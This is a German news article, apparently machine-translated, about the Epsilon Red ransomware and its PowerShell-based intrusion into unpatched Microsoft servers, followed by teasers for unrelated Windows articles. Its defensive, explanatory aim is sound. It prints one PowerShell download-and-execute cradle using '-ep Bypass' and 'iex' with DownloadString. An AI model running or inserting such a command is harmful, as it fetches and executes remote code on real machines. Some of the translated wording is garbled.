Haben Sie Ihre Server schon gepatcht ?
Eine neue Ransomware- Bedrohung namens Epsilon Red zielt auf ungepatchte Microsoft-basierte Server in Unternehmensrechenzentren ab. Epsilon Red wurde nach einem wenig bekannten Bösewicht aus Marvel-Comics benannt und kürzlich von einem Cybersicherheitsunternehmen namens Sophos entdeckt. Seit ihrer Entdeckung hat Ransomware viele Organisationen auf der ganzen Welt angegriffen.
Dateilose Ransomware „versteckt“ sich in PowerShell
Fileless Ransomware ist eine Form von Malware, die durch die Bündelung legitimer Software ausgeführt wird. Auf PowerShell basierende dateilose Malware nutzt die Fähigkeit von PowerShell, direkt in den Speicher des Geräts zu laden. Diese Funktion trägt dazu bei, Malware in PowerShell-Skripten vor der Erkennung zu schützen.
In einem typischen Szenario muss ein Skript bei der Ausführung zunächst auf das Laufwerk des Geräts geschrieben werden. Dadurch können Endpoint-Sicherheitslösungen Skripte erkennen. Da PowerShell von standardmäßigen Skriptausführungsprozessen ausgeschlossen ist, kann es die Endpunktsicherheit umgehen. Darüber hinaus ermöglicht die Verwendung des Bypass- Parameters in einem PowerShell-Skript einem Angreifer, Netzwerkskriptbeschränkungen zu umgehen.
Ein Beispiel für einen PowerShell-Bypass-Parameter ist:
powershell.exe -ep Bypass -nop -noexit -c iex ((New Object.WebClient).DownloadString(‘url’))Wie Sie sehen, ist das Entwerfen von PowerShell-Bypass-Parametern relativ einfach.
Als Reaktion darauf hat Microsoft einen Patch veröffentlicht, der eine Schwachstelle bezüglich Remote-Malwareausführung im Zusammenhang mit PowerShell behebt. Allerdings sind Pflaster nur so wirksam, wie sie verwendet werden. Viele Organisationen haben gelockerte Patching-Standards, wodurch ihre Umgebungen anfällig für Angriffe sind. Das Design von Epsilon Red besteht darin, diese Schwachstelle auszunutzen.
Der doppelte Nutzen von Epsilon Red
Da Epsilon Red am effektivsten gegen ungepatchte Microsoft-Server ist, kann die Malware als Ransomware- und Identifizierungstool verwendet werden. Ob Epsilon in einer Umgebung erfolgreich ist oder nicht, gibt Angreifern einen besseren Einblick in die Sicherheitsfunktionen ihres Ziels.
Wenn Epsilon erfolgreich auf Microsoft Exchange Server zugreift, weist dies darauf hin, dass die Organisation die gängigen Best Practices für die Patch-Sicherheit nicht befolgt. Für den Angreifer zeigt dies, wie leicht die restliche Umgebung des Ziels durch Epsilon kompromittiert werden kann.
Epsilon Red nutzt Verschleierung, um seine Nutzlast zu verbergen. Verschleierung macht Code unlesbar und wird in PowerShell-Malware verwendet, um eine hohe Lesbarkeit von PowerShell-Skripten zu verhindern. Bei der Verschleierung werden PowerShell-Alias- Cmdlets verwendet, um es Antivirensoftware zu erschweren, schädliche Skripte in PowerShell-Protokollen zu identifizieren.
Epsilon Red ist am effektivsten gegen ungepatchte Microsoft-Server
Verschleierte PowerShell-Skripte können jedoch weiterhin identifiziert werden. Ein häufiges Anzeichen für einen bevorstehenden PowerShell-Skriptangriff ist die Erstellung eines WebClient-Objekts. Ein Angreifer erstellt ein WebClient-Objekt im PowerShell-Code, um eine externe Verbindung zu einer Remote- URL herzustellen , die bösartigen Code enthält.
Wenn eine Organisation angegriffen wird, ist die Wahrscheinlichkeit, dass sie über ausreichende Sicherheitsmaßnahmen zur Erkennung verschleierter PowerShell-Skripte verfügt, sehr gering. Wenn es Epsilon Red hingegen nicht gelingt, in den Server einzudringen, zeigt dies dem Angreifer an, dass das Netzwerk des Ziels PowerShell-Malware schnell entschlüsseln kann, was den Angriff weniger wertvoll macht.
Epsilon Red-Cyber-Einbruch
Die Funktionalität von Epsilon Red ist sehr einfach. Die Software nutzt eine Reihe von Powershell-Skripten, um Server zu infiltrieren. Diese PowerShell-Skripte sind von 1.ps1 bis 12.ps1 nummeriert . Das Design jedes PowerShell-Skripts besteht darin, einen Zielserver für die endgültige Nutzlast vorzubereiten.
Alle PowerShell-Skripte in Epsilon Red haben ihren eigenen Zweck. Eines der PowerShell-Skripte in Epsilon Red dient dazu, die Netzwerk-Firewallregeln des Ziels aufzulösen. Eine weitere Software dieser Serie, die darauf ausgelegt ist, die Antivirensoftware des Ziels zu deinstallieren.
Wie Sie sich vielleicht vorstellen können, arbeiten diese Skripte synchron, um sicherzustellen, dass das Ziel nach der Zustellung der Nutzlast ihren Fortschritt nicht schnell stoppen kann.
Nutzlast übertragen
Sobald die PowerShell-Skripte von Epsilon Platz für die endgültige Nutzlast gemacht haben, wird sie als Erweiterung Red.exe verteilt . Wenn Red.exe den Server betritt, scannt es die Dateien des Servers und erstellt eine Liste mit Verzeichnispfaden für jede erkannte Datei. Nach dem Erstellen der Liste werden für jeden Verzeichnispfad in der Liste untergeordnete Prozesse aus der Haupt-Malware-Datei erstellt. Anschließend verschlüsselt jede Ransomware-Subdatei einen Verzeichnispfad aus der Listendatei.
Nachdem alle Ordnerpfade in der Epson-Liste verschlüsselt wurden, bleibt eine TXT-Datei zurück, um das Ziel zu informieren und die Anfrage des Angreifers darzulegen. Darüber hinaus werden dann alle erreichbaren Netzwerkknoten, die mit dem kompromittierten Server verbunden sind, kompromittiert und die Wahrscheinlichkeit, dass Malware in das Netzwerk eindringt, kann steigen.
Wer steckt hinter Epsilon Red?
Die Identität der Angreifer hinter Epsilon Red ist noch unbekannt
Die Identität der Angreifer hinter Epsilon Red ist noch unbekannt. Einige Hinweise deuten jedoch auf die Herkunft der Angreifer hin. Der erste Hinweis ist der Name der Malware. Epsilon Red ist ein X-Men-Bösewicht mit russischer Herkunft.
Der zweite Hinweis liegt in der Lösegeldforderung der TXT-Datei, die der Code hinterlassen hat. Es ähnelt der Notiz, die von einer Ransomware-Bande namens REvil hinterlassen wurde. Diese Ähnlichkeit deutet jedoch nicht darauf hin, dass die Angreifer Mitglieder dieser Bande waren. REvil betreibt einen RaaS-Betrieb (Ransomware as a Service), bei dem Partner REvil für den Zugriff auf seine Malware bezahlen.
Schützen Sie sich vor Epsilon Red
Bisher ist Epsilon Red erfolgreich in ungepatchte Server eingedrungen. Das bedeutet, dass einer der besten Schutzmaßnahmen gegen Epsilon Red und ähnliche Ransomware-Malware darin besteht, sicherzustellen, dass Ihre Umgebung ordnungsgemäß verwaltet wird. Darüber hinaus wäre eine Sicherheitslösung, die PowerShell-Skripte schnell entschlüsseln kann, eine nützliche Ergänzung für Ihre Umgebung.
Sehen Sie in der rechten Ecke des Bildschirms eine Windows 10-Aktivierungsbenachrichtigung? In diesem Artikel erfahren Sie, wie Sie den Copyright-Anfragehinweis unter Windows 10 löschen.
Kürzlich hat Microsoft das neueste kumulative Update für Windows 10-PC-Benutzer namens Build 14393.222 veröffentlicht. Dieses für Windows 10 veröffentlichte Update behebt hauptsächlich Fehler basierend auf Benutzerfeedback und verbessert die Leistung des Betriebssystems.
Gibt es Computer in Ihrem lokalen Netzwerk, die externen Zugriff benötigen? Die Verwendung eines Bastion-Hosts als Gatekeeper für Ihr Netzwerk kann eine gute Lösung sein.
Wenn Sie lieber eine alte klassische Tastatur wie das IBM Model M verwenden möchten, die keine physische Windows-Taste enthält, können Sie ganz einfach weitere hinzufügen, indem Sie sich eine Taste ausleihen, die Sie nicht oft verwenden. .
Manchmal müssen Sie möglicherweise alle alten Ereignisprotokolle auf einmal löschen. In dieser Anleitung zeigt Ihnen Quantrimang.com drei Möglichkeiten zum schnellen Löschen aller Ereignisprotokolle in der Windows 10-Ereignisanzeige.
In vielen früheren Artikeln haben wir erwähnt, dass es äußerst wichtig ist, online anonym zu bleiben. Jedes Jahr werden private Informationen preisgegeben, wodurch Online-Sicherheit immer wichtiger wird. Das ist auch der Grund, warum wir virtuelle IP-Adressen verwenden sollten. Im Folgenden erfahren Sie mehr über Methoden zur Erstellung gefälschter IPs!
WindowTop ist ein Tool, das alle Anwendungsfenster und Programme, die auf Windows 10-Computern ausgeführt werden, dimmen kann. Alternativ können Sie unter Windows eine Benutzeroberfläche mit dunklem Hintergrund verwenden.
Die Sprachleiste unter Windows 8 ist eine Miniatur-Sprachsymbolleiste, die automatisch auf dem Desktop-Bildschirm angezeigt wird. Viele Leute möchten diese Sprachleiste jedoch in der Taskleiste ausblenden.
Drahtlose Konnektivität ist heutzutage eine Notwendigkeit und daher ist drahtlose Sicherheit unerlässlich, um die Sicherheit in Ihrem internen Netzwerk zu gewährleisten.
Die Maximierung der Internetgeschwindigkeit ist für die Optimierung Ihrer Netzwerkverbindung von entscheidender Bedeutung. Mit Computern, internetfähigen Fernsehern, Spielekonsolen usw. können Sie ein optimales Unterhaltungs- und Arbeitserlebnis genießen.
